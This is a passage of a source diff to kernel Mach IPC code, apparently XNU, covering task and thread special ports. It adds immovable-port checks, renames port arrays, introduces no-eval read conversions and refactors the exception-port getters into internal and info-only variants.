thread->ith_self[THREAD_FLAVOR_CONTROL]) { - /* no interposing */ - sright = ipc_port_copy_send(port); - assert(sright == port); + if (thread->ith_settable_self == thread->ith_thread_ports[THREAD_FLAVOR_CONTROL]) { + /* no interposing, return IMMOVABLE_PORT */ + port = ipc_port_make_send(thread->ith_self); } else { - port = ipc_port_copy_send(port); + port = ipc_port_copy_send(thread->ith_settable_self); } thread_mtx_unlock(thread); @@ -1129,8 +1400,7 @@ thread_get_special_port( int which, ipc_port_t *portp); -kern_return_t -static +static kern_return_t thread_get_special_port_internal( thread_inspect_t thread, int which, @@ -1176,7 +1446,6 @@ thread_get_special_port_internal( } *portp = port; - return KERN_SUCCESS; } @@ -1189,6 +1458,26 @@ thread_get_special_port( return thread_get_special_port_internal(thread, which, portp, THREAD_FLAVOR_CONTROL); } +static ipc_port_t +thread_get_non_substituted_self(thread_t thread) +{ + ipc_port_t port = IP_NULL; + + thread_mtx_lock(thread); + port = thread->ith_settable_self; + if (IP_VALID(port)) { + ip_reference(port); + } + thread_mtx_unlock(thread); + + if (IP_VALID(port)) { + /* consumes the port reference */ + return ipc_kobject_alloc_subst_once(port); + } + + return port; +} + kern_return_t thread_get_special_port_from_user( mach_port_t port, @@ -1196,29 +1485,49 @@ thread_get_special_port_from_user( ipc_port_t *portp) { ipc_kobject_type_t kotype; - kern_return_t kr; + mach_thread_flavor_t flavor; + kern_return_t kr = KERN_SUCCESS; - thread_t thread = convert_port_to_thread_check_type(port, &kotype, THREAD_FLAVOR_INSPECT, FALSE); + thread_t thread = convert_port_to_thread_check_type(port, &kotype, + THREAD_FLAVOR_INSPECT, FALSE); if (thread == THREAD_NULL) { return KERN_INVALID_ARGUMENT; } + if (which == THREAD_KERNEL_PORT && thread->task == current_task()) { +#if CONFIG_MACF + /* + * only check for threads belong to current_task, + * because foreign thread ports are always movable + */ + if (mac_task_check_get_movable_control_port()) { + kr = KERN_DENIED; + goto out; + } +#endif + if (kotype == IKOT_THREAD_CONTROL) { + *portp = thread_get_non_substituted_self(thread); + goto out; + } + } + switch (kotype) { case IKOT_THREAD_CONTROL: - kr = thread_get_special_port_internal(thread, which, portp, THREAD_FLAVOR_CONTROL); + flavor = THREAD_FLAVOR_CONTROL; break; case IKOT_THREAD_READ: - kr = thread_get_special_port_internal(thread, which, portp, THREAD_FLAVOR_READ); + flavor = THREAD_FLAVOR_READ; break; case IKOT_THREAD_INSPECT: - kr = thread_get_special_port_internal(thread, which, portp, THREAD_FLAVOR_INSPECT); + flavor = THREAD_FLAVOR_INSPECT; break; default: panic("strange kobject type"); - break; } + kr = thread_get_special_port_internal(thread, which, portp, flavor); +out: thread_deallocate(thread); return kr; } @@ -1267,6 +1576,7 @@ port_allowed_with_thread_flavor( * Returns: * KERN_SUCCESS Changed the special port. * KERN_INVALID_ARGUMENT The thread is null. + * KERN_INVALID_RIGHT Port is marked as immovable. * KERN_FAILURE The thread is dead. * KERN_INVALID_ARGUMENT Invalid special port. * KERN_NO_ACCESS Restricted access to set port. @@ -1276,7 +1586,7 @@ kern_return_t thread_set_special_port( thread_t thread, int which, - ipc_port_t port) + ipc_port_t port) { kern_return_t result = KERN_SUCCESS; ipc_port_t *whichp, old = IP_NULL; @@ -1285,6 +1595,10 @@ thread_set_special_port( return KERN_INVALID_ARGUMENT; } + if (IP_VALID(port) && (port->ip_immovable_receive || port->ip_immovable_send)) { + return KERN_INVALID_RIGHT; + } + switch (which) { case THREAD_KERNEL_PORT: #if CONFIG_CSR @@ -1330,9 +1644,9 @@ thread_set_special_port( * Conditions: * Nothing locked. * Returns: - * KERN_SUCCESS Extracted a send right. + * KERN_SUCCESS Extracted a send right. * KERN_INVALID_ARGUMENT The task is null. - * KERN_FAILURE The task/space is dead. + * KERN_FAILURE The task/space is dead. * KERN_INVALID_ARGUMENT Invalid special port. */ @@ -1361,7 +1675,7 @@ task_get_special_port_internal( } itk_lock(task); - if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) { + if (!task->ipc_active) { itk_unlock(task); return KERN_FAILURE; } @@ -1369,6 +1683,7 @@ task_get_special_port_internal( switch (which) { case TASK_KERNEL_PORT: port = ipc_port_copy_send(task->itk_settable_self); + itk_unlock(task); break; case TASK_READ_PORT: @@ -1379,30 +1694,36 @@ task_get_special_port_internal( /* convert_task_to_port_with_flavor consumes a task reference */ task_reference(task); port = convert_task_to_port_with_flavor(task, current_flavor); - goto copyout; + break; case TASK_NAME_PORT: - port = ipc_port_make_send(task->itk_self[TASK_FLAVOR_NAME]); + port = ipc_port_make_send(task->itk_task_ports[TASK_FLAVOR_NAME]); + itk_unlock(task); break; case TASK_HOST_PORT: port = ipc_port_copy_send(task->itk_host); + itk_unlock(task); break; case TASK_BOOTSTRAP_PORT: port = ipc_port_copy_send(task->itk_bootstrap); + itk_unlock(task); break; case TASK_SEATBELT_PORT: port = ipc_port_copy_send(task->itk_seatbelt); + itk_unlock(task); break; case TASK_ACCESS_PORT: port = ipc_port_copy_send(task->itk_task_access); + itk_unlock(task); break; case TASK_DEBUG_CONTROL_PORT: port = ipc_port_copy_send(task->itk_debug_control); + itk_unlock(task); break; default: @@ -1410,9 +1731,6 @@ task_get_special_port_internal( return KERN_INVALID_ARGUMENT; } - itk_unlock(task); - -copyout: *portp = port; return KERN_SUCCESS; } @@ -1426,6 +1744,25 @@ task_get_special_port( return task_get_special_port_internal(task, which, portp, TASK_FLAVOR_CONTROL); } +static ipc_port_t +task_get_non_substituted_self(task_t task) +{ + ipc_port_t port = IP_NULL; + + itk_lock(task); + port = task->itk_settable_self; + if (IP_VALID(port)) { + ip_reference(port); + } + itk_unlock(task); + + if (IP_VALID(port)) { + /* consumes the port reference */ + return ipc_kobject_alloc_subst_once(port); + } + + return port; +} kern_return_t task_get_special_port_from_user( mach_port_t port, @@ -1433,29 +1770,49 @@ task_get_special_port_from_user( ipc_port_t *portp) { ipc_kobject_type_t kotype; - kern_return_t kr; + mach_task_flavor_t flavor; + kern_return_t kr = KERN_SUCCESS; - task_t task = convert_port_to_task_check_type(port, &kotype, TASK_FLAVOR_INSPECT, FALSE); + task_t task = convert_port_to_task_check_type(port, &kotype, + TASK_FLAVOR_INSPECT, FALSE); if (task == TASK_NULL) { return KERN_INVALID_ARGUMENT; } + if (which == TASK_KERNEL_PORT && task == current_task()) { +#if CONFIG_MACF + /* + * only check for current_task, + * because foreign task ports are always movable + */ + if (mac_task_check_get_movable_control_port()) { + kr = KERN_DENIED; + goto out; + } +#endif + if (kotype == IKOT_TASK_CONTROL) { + *portp = task_get_non_substituted_self(task); + goto out; + } + } + switch (kotype) { case IKOT_TASK_CONTROL: - kr = task_get_special_port_internal(task, which, portp, TASK_FLAVOR_CONTROL); + flavor = TASK_FLAVOR_CONTROL; break; case IKOT_TASK_READ: - kr = task_get_special_port_internal(task, which, portp, TASK_FLAVOR_READ); + flavor = TASK_FLAVOR_READ; break; case IKOT_TASK_INSPECT: - kr = task_get_special_port_internal(task, which, portp, TASK_FLAVOR_INSPECT); + flavor = TASK_FLAVOR_INSPECT; break; default: panic("strange kobject type"); - break; } + kr = task_get_special_port_internal(task, which, portp, flavor); +out: task_deallocate(task); return kr; } @@ -1504,11 +1861,12 @@ port_allowed_with_task_flavor( * Nothing locked. If successful, consumes * the supplied send right. * Returns: - * KERN_SUCCESS Changed the special port. + * KERN_SUCCESS Changed the special port. * KERN_INVALID_ARGUMENT The task is null. - * KERN_FAILURE The task/space is dead. + * KERN_INVALID_RIGHT Port is marked as immovable. + * KERN_FAILURE The task/space is dead. * KERN_INVALID_ARGUMENT Invalid special port. - * KERN_NO_ACCESS Restricted access to set port. + * KERN_NO_ACCESS Restricted access to set port. */ kern_return_t @@ -1525,6 +1883,10 @@ task_set_special_port( return KERN_NO_ACCESS; } + if (IP_VALID(port) && (port->ip_immovable_receive || port->ip_immovable_send)) { + return KERN_INVALID_RIGHT; + } + switch (which) { case TASK_KERNEL_PORT: case TASK_HOST_PORT: @@ -1576,7 +1938,7 @@ task_set_special_port_internal( } itk_lock(task); - if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) { + if (!task->ipc_active) { rc = KERN_FAILURE; goto out_unlock; } @@ -1649,7 +2011,8 @@ out: * Nothing locked. If successful, consumes * the supplied rights and memory. * Returns: - * KERN_SUCCESS Stashed the port rights. + * KERN_SUCCESS Stashed the port rights. + * KERN_INVALID_RIGHT Port in array is marked immovable. * KERN_INVALID_ARGUMENT The task is null. * KERN_INVALID_ARGUMENT The task is dead. * KERN_INVALID_ARGUMENT The memory param is null. @@ -1677,13 +2040,16 @@ mach_ports_register( for (i = 0; i < portsCnt; i++) { ports[i] = memory[i]; + if (IP_VALID(ports[i]) && (ports[i]->ip_immovable_receive || ports[i]->ip_immovable_send)) { + return KERN_INVALID_RIGHT; + } } for (; i < TASK_PORT_REGISTER_MAX; i++) { ports[i] = IP_NULL; } itk_lock(task); - if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) { + if (!task->ipc_active) { itk_unlock(task); return KERN_INVALID_ARGUMENT; } @@ -1759,7 +2125,7 @@ mach_ports_lookup( } itk_lock(task); - if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) { + if (!task->ipc_active) { itk_unlock(task); kfree(memory, size); @@ -1839,7 +2205,7 @@ task_conversion_eval(task_t caller, task_t victim) * Conditions: * Nothing locked, blocking OK. */ -task_t +static task_t convert_port_to_locked_task(ipc_port_t port, boolean_t eval) { int try_failed_count = 0; @@ -1886,7 +2252,7 @@ convert_port_to_locked_task(ipc_port_t port, boolean_t eval) * Conditions: * Nothing locked, blocking OK. */ -task_inspect_t +static task_inspect_t convert_port_to_locked_task_inspect(ipc_port_t port) { int try_failed_count = 0; @@ -1928,12 +2294,15 @@ convert_port_to_locked_task_inspect(ipc_port_t port) * Conditions: * Nothing locked, blocking OK. */ -task_read_t -convert_port_to_locked_task_read(ipc_port_t port) +static task_read_t +convert_port_to_locked_task_read( + ipc_port_t port, + boolean_t eval) { int try_failed_count = 0; while (IP_VALID(port)) { + task_t ct = current_task(); task_read_t task; ip_lock(port); @@ -1942,8 +2311,14 @@ convert_port_to_locked_task_read(ipc_port_t port) ip_unlock(port); return TASK_READ_NULL; } - task = (task_read_t)port->ip_kobject; + task = (task_read_t)ipc_kobject_get(port); assert(task != TASK_READ_NULL); + + if (eval && task_conversion_eval(ct, task)) { + ip_unlock(port); + return TASK_READ_NULL; + } + /* * Normal lock ordering puts task_lock() before ip_lock(). * Attempt out-of-order locking here. @@ -2174,7 +2549,8 @@ convert_port_to_task_inspect_locked( static task_read_t convert_port_to_task_read_locked( - ipc_port_t port) + ipc_port_t port, + boolean_t eval) { task_read_t task = TASK_READ_NULL; @@ -2184,11 +2560,11 @@ convert_port_to_task_read_locked( if (ip_kotype(port) == IKOT_TASK_CONTROL || ip_kotype(port) == IKOT_TASK_READ) { task_t ct = current_task(); - task = (task_t)port->ip_kobject; + task = (task_read_t)ipc_kobject_get(port); assert(task != TASK_READ_NULL); - if (task_conversion_eval(ct, task)) { + if (eval && task_conversion_eval(ct, task)) { return TASK_READ_NULL; } @@ -2241,7 +2617,7 @@ convert_port_to_task_check_type( break; case IKOT_TASK_READ: if (at_most >= TASK_FLAVOR_READ) { - task = convert_port_to_task_read(port); + task = eval_check ? convert_port_to_task_read(port) : convert_port_to_task_read_no_eval(port); if (task != TASK_READ_NULL) { type = IKOT_TASK_READ; } @@ -2319,7 +2695,7 @@ convert_port_to_thread_check_type( break; case IKOT_THREAD_READ: if (at_most >= THREAD_FLAVOR_READ) { - thread = convert_port_to_thread_read(port); + thread = eval_check ? convert_port_to_thread_read(port) : convert_port_to_thread_read_no_eval(port); if (thread != THREAD_READ_NULL) { type = IKOT_THREAD_READ; } @@ -2387,7 +2763,7 @@ convert_port_to_space_check_type( break; case IKOT_TASK_READ: if (at_most >= TASK_FLAVOR_READ) { - space = convert_port_to_space_read(port); + space = eval_check ? convert_port_to_space_read(port) : convert_port_to_space_read_no_eval(port); if (space != IPC_SPACE_READ_NULL) { type = IKOT_TASK_READ; } @@ -2456,7 +2832,24 @@ convert_port_to_task_read( if (IP_VALID(port)) { ip_lock(port); if (ip_active(port)) { - task = convert_port_to_task_read_locked(port); + task = convert_port_to_task_read_locked(port, TRUE); + } + ip_unlock(port); + } + + return task; +} + +static task_read_t +convert_port_to_task_read_no_eval( + ipc_port_t port) +{ + task_read_t task = TASK_READ_NULL; + + if (IP_VALID(port)) { + ip_lock(port); + if (ip_active(port)) { + task = convert_port_to_task_read_locked(port, FALSE); } ip_unlock(port); } @@ -2519,7 +2912,7 @@ convert_port_to_space_with_flavor( task = convert_port_to_locked_task(port, eval); break; case TASK_FLAVOR_READ: - task = convert_port_to_locked_task_read(port); + task = convert_port_to_locked_task_read(port, eval); break; case TASK_FLAVOR_INSPECT: task = convert_port_to_locked_task_inspect(port); @@ -2565,6 +2958,13 @@ convert_port_to_space_read( return convert_port_to_space_with_flavor(port, TASK_FLAVOR_READ, TRUE); } +static ipc_space_read_t +convert_port_to_space_read_no_eval( + ipc_port_t port) +{ + return convert_port_to_space_with_flavor(port, TASK_FLAVOR_READ, FALSE); +} + ipc_space_inspect_t convert_port_to_space_inspect( ipc_port_t port) @@ -2592,13 +2992,13 @@ convert_port_to_map_with_flavor( switch (flavor) { case TASK_FLAVOR_CONTROL: - task = convert_port_to_locked_task(port, TRUE); + task = convert_port_to_locked_task(port, TRUE); /* always eval */ break; case TASK_FLAVOR_READ: - task = convert_port_to_locked_task_read(port); + task = convert_port_to_locked_task_read(port, TRUE); /* always eval */ break; case TASK_FLAVOR_INSPECT: - task = convert_port_to_locked_task_inspect(port); + task = convert_port_to_locked_task_inspect(port); /* always no eval */ break; default: task = TASK_NULL; @@ -2628,7 +3028,7 @@ convert_port_to_map_with_flavor( pmap_require(map->pmap); } - vm_map_reference_swap(map); + vm_map_reference(map); task_unlock(task); return map; } @@ -2758,7 +3158,7 @@ convert_port_to_thread_inspect_locked( if (ip_kotype(port) == IKOT_THREAD_CONTROL || ip_kotype(port) == IKOT_THREAD_READ || ip_kotype(port) == IKOT_THREAD_INSPECT) { - thread = (thread_inspect_t)port->ip_kobject; + thread = (thread_inspect_t)ipc_kobject_get(port); assert(thread != THREAD_INSPECT_NULL); thread_reference_internal((thread_t)thread); } @@ -2794,7 +3194,8 @@ convert_port_to_thread_inspect( */ static thread_read_t convert_port_to_thread_read_locked( - ipc_port_t port) + ipc_port_t port, + boolean_t eval) { thread_read_t thread = THREAD_READ_NULL; @@ -2807,7 +3208,7 @@ convert_port_to_thread_read_locked( assert(thread != THREAD_READ_NULL); /* Use task conversion rules for thread control conversions */ - if (task_conversion_eval(current_task(), thread->task) != KERN_SUCCESS) { + if (eval && task_conversion_eval(current_task(), thread->task) != KERN_SUCCESS) { return THREAD_READ_NULL; } @@ -2826,7 +3227,24 @@ convert_port_to_thread_read( if (IP_VALID(port)) { ip_lock(port); if (ip_active(port)) { - thread = convert_port_to_thread_read_locked(port); + thread = convert_port_to_thread_read_locked(port, TRUE); + } + ip_unlock(port); + } + + return thread; +} + +static thread_read_t +convert_port_to_thread_read_no_eval( + ipc_port_t port) +{ + thread_read_t thread = THREAD_READ_NULL; + + if (IP_VALID(port)) { + ip_lock(port); + if (ip_active(port)) { + thread = convert_port_to_thread_read_locked(port, FALSE); } ip_unlock(port); } @@ -2853,16 +3271,13 @@ convert_thread_to_port_with_flavor( thread_mtx_lock(thread); - if (thread->ith_self[THREAD_FLAVOR_CONTROL] == IP_NULL) { + if (!thread->ipc_active) { goto exit; } if (flavor == THREAD_FLAVOR_CONTROL) { - port = ipc_port_make_send(thread->ith_self[flavor]); + port = ipc_port_make_send(thread->ith_thread_ports[flavor]); } else { - if (!thread->active) { - goto exit; - } ipc_kobject_type_t kotype = (flavor == THREAD_FLAVOR_READ) ? IKOT_THREAD_READ : IKOT_THREAD_INSPECT; /* * Claim a send right on the thread read/inspect port, and request a no-senders @@ -2873,9 +3288,9 @@ convert_thread_to_port_with_flavor( * send-once notification firing, and this is done under the thread mutex * rather than with atomics. */ - (void)ipc_kobject_make_send_lazy_alloc_port(&thread->ith_self[flavor], (ipc_kobject_t)thread, - kotype, false, 0); - port = thread->ith_self[flavor]; + (void)ipc_kobject_make_send_lazy_alloc_port(&thread->ith_thread_ports[flavor], (ipc_kobject_t)thread, + kotype, IPC_KOBJECT_ALLOC_IMMOVABLE_SEND, false, 0); + port = thread->ith_thread_ports[flavor]; } exit: @@ -2977,7 +3392,7 @@ port_name_to_task_read( if (MACH_PORT_VALID(name)) { kr = ipc_port_translate_send(current_space(), name, &kport); if (kr == KERN_SUCCESS) { - tr = convert_port_to_task_read_locked(kport); + tr = convert_port_to_task_read_locked(kport, TRUE); ip_unlock(kport); } } @@ -2989,8 +3404,7 @@ port_name_to_task_read( * Purpose: * Convert from a port name to a task reference * A name of MACH_PORT_NULL is valid for the null task. - * It doesnt run the task_conversion_eval check if the port - * is of type IKOT_TASK_CONTROL. + * Skips task_conversion_eval() during conversion. * Conditions: * Nothing locked. */ @@ -3005,48 +3419,13 @@ port_name_to_task_read_no_eval( if (MACH_PORT_VALID(name)) { kr = ipc_port_translate_send(current_space(), name, &kport); if (kr == KERN_SUCCESS) { - switch (ip_kotype(kport)) { - case IKOT_TASK_CONTROL: - tr = convert_port_to_task_locked(kport, NULL, FALSE); - break; - case IKOT_TASK_READ: - tr = convert_port_to_task_read_locked(kport); - break; - default: - break; - } + tr = convert_port_to_task_read_locked(kport, FALSE); ip_unlock(kport); } } return tr; } -/* - * Routine: port_name_to_task_inspect - * Purpose: - * Convert from a port name to a task reference - * A name of MACH_PORT_NULL is valid for the null task. - * Conditions: - * Nothing locked. - */ -task_inspect_t -port_name_to_task_inspect( - mach_port_name_t name) -{ - ipc_port_t kport; - kern_return_t kr; - task_inspect_t ti = TASK_INSPECT_NULL; - - if (MACH_PORT_VALID(name)) { - kr = ipc_port_translate_send(current_space(), name, &kport); - if (kr == KERN_SUCCESS) { - ti = convert_port_to_task_inspect_locked(kport); - ip_unlock(kport); - } - } - return ti; -} - /* * Routine: port_name_to_task_name * Purpose: @@ -3118,10 +3497,14 @@ convert_task_to_port_with_flavor( itk_lock(task); + if (!task->ipc_active) { + goto exit; + } + switch (flavor) { case TASK_FLAVOR_CONTROL: case TASK_FLAVOR_NAME: - port = ipc_port_make_send(task->itk_self[flavor]); + port = ipc_port_make_send(task->itk_task_ports[flavor]); break; /* * Claim a send right on the task read/inspect port, and request a no-senders @@ -3133,14 +3516,11 @@ convert_task_to_port_with_flavor( */ case TASK_FLAVOR_READ: case TASK_FLAVOR_INSPECT: - if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) { - /* task is either disabled or terminated */ - goto exit; - } kotype = (flavor == TASK_FLAVOR_READ) ? IKOT_TASK_READ : IKOT_TASK_INSPECT; - (void)ipc_kobject_make_send_lazy_alloc_port((ipc_port_t *) &task->itk_self[flavor], - (ipc_kobject_t)task, kotype, true, OS_PTRAUTH_DISCRIMINATOR("task.itk_self")); - port = task->itk_self[flavor]; + (void)ipc_kobject_make_send_lazy_alloc_port((ipc_port_t *) &task->itk_task_ports[flavor], + (ipc_kobject_t)task, kotype, IPC_KOBJECT_ALLOC_IMMOVABLE_SEND, true, + OS_PTRAUTH_DISCRIMINATOR("task.itk_task_ports")); + port = task->itk_task_ports[flavor]; break; } @@ -3179,6 +3559,22 @@ convert_task_name_to_port( return convert_task_to_port_with_flavor(task, TASK_FLAVOR_NAME); } +ipc_port_t +convert_task_to_port_pinned( + task_t task) +{ + ipc_port_t port = IP_NULL; + + itk_lock(task); + + if (task->ipc_active && task->itk_self != IP_NULL) { + port = ipc_port_make_send(task->itk_self); + } + + itk_unlock(task); + task_deallocate(task); + return port; +} /* * Routine: convert_task_suspend_token_to_port * Purpose: @@ -3218,6 +3614,22 @@ convert_task_suspension_token_to_port( return port; } +ipc_port_t +convert_thread_to_port_pinned( + thread_t thread) +{ + ipc_port_t port = IP_NULL; + + thread_mtx_lock(thread); + + if (thread->ipc_active && thread->ith_self != IP_NULL) { + port = ipc_port_make_send(thread->ith_self); + } + + thread_mtx_unlock(thread); + thread_deallocate(thread); + return port; +} /* * Routine: space_deallocate * Purpose: @@ -3377,7 +3789,7 @@ thread_set_exception_ports( } } - if (IP_VALID(new_port)) { /* consume send right */ + if (IP_VALID(new_port)) { /* consume send right */ ipc_port_release_send(new_port); } @@ -3436,9 +3848,8 @@ task_set_exception_ports( itk_lock(task); - if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) { + if (!task->ipc_active) { itk_unlock(task); - return KERN_FAILURE; } @@ -3471,7 +3882,7 @@ task_set_exception_ports( } } - if (IP_VALID(new_port)) { /* consume send right */ + if (IP_VALID(new_port)) { /* consume send right */ ipc_port_release_send(new_port); } @@ -3620,7 +4031,7 @@ thread_swap_exception_ports( } } - if (IP_VALID(new_port)) { /* consume send right */ + if (IP_VALID(new_port)) { /* consume send right */ ipc_port_release_send(new_port); } @@ -3681,7 +4092,7 @@ task_swap_exception_ports( itk_lock(task); - if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) { + if (!task->ipc_active) { itk_unlock(task); #if CONFIG_MACF mac_exc_free_label(new_label); @@ -3740,7 +4151,7 @@ task_swap_exception_ports( } } - if (IP_VALID(new_port)) { /* consume send right */ + if (IP_VALID(new_port)) { /* consume send right */ ipc_port_release_send(new_port); } @@ -3767,27 +4178,21 @@ task_swap_exception_ports( * Illegal mask bit set. * KERN_FAILURE The thread is dead. */ -kern_return_t -thread_get_exception_ports( - thread_t thread, - exception_mask_t exception_mask, - exception_mask_array_t masks, - mach_msg_type_number_t *CountCnt, - exception_port_array_t ports, - exception_behavior_array_t behaviors, - thread_state_flavor_array_t flavors); - -kern_return_t -thread_get_exception_ports( - thread_t thread, - exception_mask_t exception_mask, +static kern_return_t +thread_get_exception_ports_internal( + thread_t thread, + exception_mask_t exception_mask, exception_mask_array_t masks, mach_msg_type_number_t *CountCnt, + exception_port_info_array_t ports_info, exception_port_array_t ports, exception_behavior_array_t behaviors, thread_state_flavor_array_t flavors) { - unsigned int i, j, count; + unsigned int count; + boolean_t info_only = (ports_info != NULL); + boolean_t dbg_ok = TRUE; + ipc_port_t port_ptrs[EXC_TYPES_COUNT]; /* pointers only, does not hold right */ if (thread == THREAD_NULL) { return KERN_INVALID_ARGUMENT; @@ -3797,6 +4202,18 @@ thread_get_exception_ports( return KERN_INVALID_ARGUMENT; } + if (!info_only && !ports) { + return KERN_INVALID_ARGUMENT; + } + +#if !(DEVELOPMENT || DEBUG) && CONFIG_MACF + if (info_only && mac_task_check_expose_task(kernel_task, TASK_FLAVOR_CONTROL) == 0) { + dbg_ok = TRUE; + } else { + dbg_ok = FALSE; + } +#endif + thread_mtx_lock(thread); if (!thread->active) { @@ -3811,30 +4228,45 @@ thread_get_exception_ports( goto done; } - for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; ++i) { + for (int i = FIRST_EXCEPTION, j = 0; i < EXC_TYPES_COUNT; ++i) { if (exception_mask & (1 << i)) { + ipc_port_t exc_port = thread->exc_actions[i].port; + exception_behavior_t exc_behavior = thread->exc_actions[i].behavior; + thread_state_flavor_t exc_flavor = thread->exc_actions[i].flavor; + for (j = 0; j < count; ++j) { /* * search for an identical entry, if found * set corresponding mask for this exception. */ - if (thread->exc_actions[i].port == ports[j] && - thread->exc_actions[i].behavior == behaviors[j] && - thread->exc_actions[i].flavor == flavors[j]) { + if (exc_port == port_ptrs[j] && + exc_behavior == behaviors[j] && + exc_flavor == flavors[j]) { masks[j] |= (1 << i); break; } } - if (j == count) { + if (j == count && count < *CountCnt) { masks[j] = (1 << i); - ports[j] = ipc_port_copy_send(thread->exc_actions[i].port); - behaviors[j] = thread->exc_actions[i].behavior; - flavors[j] = thread->exc_actions[i].flavor; - ++count; - if (count >= *CountCnt) { - break; + port_ptrs[j] = exc_port; + + if (info_only) { + if (!dbg_ok || !IP_VALID(exc_port)) { + /* avoid taking port lock if !dbg_ok */ + ports_info[j] = (ipc_info_port_t){ .iip_port_object = 0, .iip_receiver_object = 0 }; + } else { + uintptr_t receiver; + (void)ipc_port_get_receiver_task(exc_port, &receiver); + ports_info[j].iip_port_object = (natural_t)VM_KERNEL_ADDRPERM(exc_port); + ports_info[j].iip_receiver_object = receiver ? (natural_t)VM_KERNEL_ADDRPERM(receiver) : 0; + } + } else { + ports[j] = ipc_port_copy_send(exc_port); } + behaviors[j] = exc_behavior; + flavors[j] = exc_flavor; + ++count; } } } @@ -3847,51 +4279,84 @@ done: return KERN_SUCCESS; } +static kern_return_t +thread_get_exception_ports( + thread_t thread, + exception_mask_t exception_mask, + exception_mask_array_t masks, + mach_msg_type_number_t *CountCnt, + exception_port_array_t ports, + exception_behavior_array_t behaviors, + thread_state_flavor_array_t flavors) +{ + return thread_get_exception_ports_internal(thread, exception_mask, masks, CountCnt, + NULL, ports, behaviors, flavors); +} + kern_return_t -thread_get_exception_ports_from_user( +thread_get_exception_ports_info( mach_port_t port, exception_mask_t exception_mask, exception_mask_array_t masks, - mach_msg_type_number_t *CountCnt, - exception_port_array_t ports, + mach_msg_type_number_t *CountCnt, + exception_port_info_array_t ports_info, exception_behavior_array_t behaviors, thread_state_flavor_array_t flavors) { kern_return_t kr; - thread_t thread = convert_port_to_thread_check_type(port, NULL, THREAD_FLAVOR_CONTROL, FALSE); + thread_t thread = convert_port_to_thread_read_no_eval(port); if (thread == THREAD_NULL) { return KERN_INVALID_ARGUMENT; } - kr = thread_get_exception_ports(thread, exception_mask, masks, CountCnt, ports, behaviors, flavors); + kr = thread_get_exception_ports_internal(thread, exception_mask, masks, CountCnt, + ports_info, NULL, behaviors, flavors); thread_deallocate(thread); return kr; } kern_return_t -task_get_exception_ports( - task_t task, - exception_mask_t exception_mask, +thread_get_exception_ports_from_user( + mach_port_t port, + exception_mask_t exception_mask, exception_mask_array_t masks, - mach_msg_type_number_t *CountCnt, + mach_msg_type_number_t *CountCnt, exception_port_array_t ports, exception_behavior_array_t behaviors, - thread_state_flavor_array_t flavors); + thread_state_flavor_array_t flavors) +{ + kern_return_t kr; -kern_return_t -task_get_exception_ports( - task_t task, - exception_mask_t exception_mask, + thread_t thread = convert_port_to_thread_no_eval(port); + + if (thread == THREAD_NULL) { + return KERN_INVALID_ARGUMENT; + } + + kr = thread_get_exception_ports(thread, exception_mask, masks, CountCnt, ports, behaviors, flavors); + + thread_deallocate(thread); + return kr; +} + +static kern_return_t +task_get_exception_ports_internal( + task_t task, + exception_mask_t exception_mask, exception_mask_array_t masks, mach_msg_type_number_t *CountCnt, + exception_port_info_array_t ports_info, exception_port_array_t ports, exception_behavior_array_t behaviors, thread_state_flavor_array_t flavors) { - unsigned int i, j, count; + unsigned int count; + boolean_t info_only = (ports_info != NULL); + boolean_t dbg_ok = TRUE; + ipc_port_t port_ptrs[EXC_TYPES_COUNT]; /* pointers only, does not hold right */ if (task == TASK_NULL) { return KERN_INVALID_ARGUMENT; @@ -3901,40 +4366,66 @@ task_get_exception_ports( return KERN_INVALID_ARGUMENT; } + if (!info_only && !ports) { + return KERN_INVALID_ARGUMENT; + } + +#if !(DEVELOPMENT || DEBUG) && CONFIG_MACF + if (info_only && mac_task_check_expose_task(kernel_task, TASK_FLAVOR_CONTROL) == 0) { + dbg_ok = TRUE; + } else { + dbg_ok = FALSE; + } +#endif + itk_lock(task); - if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) { + if (!task->ipc_active) { itk_unlock(task); - return KERN_FAILURE; } count = 0; - for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; ++i) { + for (int i = FIRST_EXCEPTION, j = 0; i < EXC_TYPES_COUNT; ++i) { if (exception_mask & (1 << i)) { + ipc_port_t exc_port = task->exc_actions[i].port; + exception_behavior_t exc_behavior = task->exc_actions[i].behavior; + thread_state_flavor_t exc_flavor = task->exc_actions[i].flavor; + for (j = 0; j < count; ++j) { /* * search for an identical entry, if found * set corresponding mask for this exception. */ - if (task->exc_actions[i].port == ports[j] && - task->exc_actions[i].behavior == behaviors[j] && - task->exc_actions[i].flavor == flavors[j]) { + if (exc_port == port_ptrs[j] && + exc_behavior == behaviors[j] && + exc_flavor == flavors[j]) { masks[j] |= (1 << i); break; } } - if (j == count) { + if (j == count && count < *CountCnt) { masks[j] = (1 << i); - ports[j] = ipc_port_copy_send(task->exc_actions[i].port); - behaviors[j] = task->exc_actions[i].behavior; - flavors[j] = task->exc_actions[i].flavor; - ++count; - if (count > *CountCnt) { - break; + port_ptrs[j] = exc_port; + + if (info_only) { + if (!dbg_ok || !IP_VALID(exc_port)) { + /* avoid taking port lock if !dbg_ok */ + ports_info[j] = (ipc_info_port_t){ .iip_port_object = 0, .iip_receiver_object = 0 }; + } else { + uintptr_t receiver; + (void)ipc_port_get_receiver_task(exc_port, &receiver); + ports_info[j].iip_port_object = (natural_t)VM_KERNEL_ADDRPERM(exc_port); + ports_info[j].iip_receiver_object = receiver ? (natural_t)VM_KERNEL_ADDRPERM(receiver) : 0; + } + } else { + ports[j] = ipc_port_copy_send(exc_port); } + behaviors[j] = exc_behavior; + flavors[j] = exc_flavor; + ++count; } } } @@ -3946,6 +4437,45 @@ task_get_exception_ports( return KERN_SUCCESS; } +static kern_return_t +task_get_exception_ports( + task_t task, + exception_mask_t exception_mask, + exception_mask_array_t masks, + mach_msg_type_number_t *CountCnt, + exception_port_array_t ports, + exception_behavior_array_t behaviors, + thread_state_flavor_array_t flavors) +{ + return task_get_exception_ports_internal(task, exception_mask, masks, CountCnt, + NULL, ports, behaviors, flavors); +} + +kern_return_t +task_get_exception_ports_info( + mach_port_t port, + exception_mask_t 